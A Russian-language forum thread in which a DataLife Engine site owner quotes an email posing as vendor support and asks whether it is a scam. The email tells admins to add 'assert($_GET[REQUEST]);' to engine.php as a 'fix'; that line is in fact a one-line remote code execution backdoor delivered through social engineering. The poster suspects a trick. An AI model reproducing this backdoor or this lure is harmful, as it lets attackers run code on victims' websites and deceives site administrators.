Получил письмо с просьбой внести изменения в Engine-файл. Развод или предупреждение?

[lors 0]

Здравствуйте, сегодня получил вот такое письмо:

Благодарим Вас за использование на Вашем сайте нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 46.38.63.68

Помните, что администрация сайта не несет ответственности за содержание данного письма

Подозреваю на 80%, что скорее всего это махинации злоумышленников, которые через действия некомпетентных веб-мастеров (подобных мне) пытаются сделать их сайты еще более уязвимыми.

Так все-таки, это развод или правда? Нужно ли следовать инструкции в этом письме, оно действительно от разработчиков?

[marsic 0]

http://forum.dle-news.ru/index.php?showtopic=66893